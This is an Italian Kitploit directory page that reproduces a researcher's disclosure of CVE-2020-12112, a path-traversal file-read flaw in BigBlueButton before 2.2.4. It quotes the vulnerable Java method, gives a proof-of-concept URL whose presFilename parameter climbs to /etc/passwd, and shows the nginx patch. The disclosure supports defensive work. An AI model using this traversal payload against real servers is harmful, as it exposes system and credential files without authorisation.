Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-12112 — Le versioni di BigBlueButton precedenti alla 2.2.4 presentano una vulnerabilità LFI che consente l'accesso a file sensibili. 🚨 | Kitploit
Strumenti/GitHubGitHub/tchenu/cve-2020-12112
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubtchenu/cve-2020-12112

CVE-2020-12112

Le versioni di BigBlueButton precedenti alla 2.2.4 presentano una vulnerabilità LFI che consente l'accesso a file sensibili. 🚨

Vedi Repository
143 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-12112 🚨

Le versioni di BigBlueButton precedenti alla 2.2.4 presentano una vulnerabilità LFI che consente l'accesso a file sensibili.

Storia 📜

Durante un corso a distanza su un'istanza BigBlueButton, uno studente della mia classe ha condiviso il link alla presentazione di diapositive del mio insegnante e ho notato che il nome del file era incluso nell'URL.

Slack della scuola

root@kitploit:~
Studente: "Non serve prendere appunti, ho la diapositiva."
Io: Beh, io ho un report di sicurezza da scrivere. 😂

Giocandoci un po', sono riuscito ad accedere al file /etc/passwd del server e a scoprire l'esistenza di una vulnerabilità di sicurezza nella soluzione open-source Big Blue Button.

Ho segnalato la vulnerabilità, il team di BBB è stato rapido nel rispondermi e nel correggere la vulnerabilità (solo pochi giorni).

Poc 🧙

root@kitploit:~
public File getDownloadablePresentationFile(String meetingId, String presId, String presFilename) {
	log.info("Find downloadable presentation for meetingId={} presId={} filename={}", meetingId, presId, presFilename);

    File presDir = Util.getPresentationDir(presentationBaseDir, meetingId, presId);
    return new File(presDir.getAbsolutePath() + File.separatorChar + presFilename);
}

https://github.com/bigbluebutton/bigbluebutton/blob/v2.2.3/bbb-common-web/src/main/java/org/bigbluebutton/api/RecordingService.java#L90

Come puoi vedere, questo metodo usato da un PresentationController permette di scaricare un file di presentazione concatenando 3 parametri.

  • Percorso assoluto del file
  • Un carattere separatore
  • Nome del file

Questo rende possibile ottenere link come questo:

https://test.bigbluebutton.org/bigbluebutton/presentation/download/ffc98830dbfbac3dcc80cc4c5f30711ebd1c23e8-1586764259489/d2d9a672040fbde2a47a10bf6c37b6a4b5ae187f-1586764259500?presFilename=d2d9a672040fbde2a47a10bf6c37b6a4b5ae187f-1586764259500.pdf

Per sfruttare la vulnerabilità, basta ottenere un link valido a un file di presentazione e modificare il parametro presFilename per accedere a file sensibili.

https://test.bigbluebutton.org/bigbluebutton/presentation/download/ffc98830dbfbac3dcc80cc4c5f30711ebd1c23e8-1586764259489/d2d9a672040fbde2a47a10bf6c37b6a4b5ae187f-1586764259500?presFilename=../../../../../etc/passwd

File /etc/passwd

Patch 🤕

Il team di BBB ha corretto la vulnerabilità nella versione 2.2.4 tramite una regola di configurazione del server (HTTP), una regex e un formato preciso del nome del file.

root@kitploit:~
		location /bigbluebutton/presentation/download {
			return 404;
		}

		location ~ "^/bigbluebutton/presentation/download\/[0-9a-f]+-[0-9]+/[0-9a-f]+-[0-9]+$" {
			if ($arg_presFilename !~ "^[0-9a-f]+-[0-9]+\.[0-9a-zA-Z]+$") {
				return 404;
			}
			proxy_pass         http://127.0.0.1:8090$uri$is_args$args;
			proxy_set_header   X-Forwarded-For   $proxy_add_x_forwarded_for;
			# Workaround IE refusal to set cookies in iframe
			add_header P3P 'CP="No P3P policy available"';
		}

https://github.com/bigbluebutton/bigbluebutton/commit/5ebdf5ca7718fc8bb3c08867edd150278e6a724c#diff-c7d77969a4547b5349e55c5466948a27R45

Riferimenti 🔍

  • https://nvd.nist.gov/vuln/detail/CVE-2020-12112
  • https://github.com/bigbluebutton/bigbluebutton/blob/master/bigbluebutton-web/grails-app/controllers/org/bigbluebutton/web/controllers/PresentationController.groovy
  • https://github.com/bigbluebutton/bigbluebutton/commit/5ebdf5ca7718fc8bb3c08867edd150278e6a724c
  • https://twitter.com/thibeault_chenu/status/1249976515917422593
  • https://twitter.com/bigbluebutton/status/1252706369486180353
Scarica lo strumento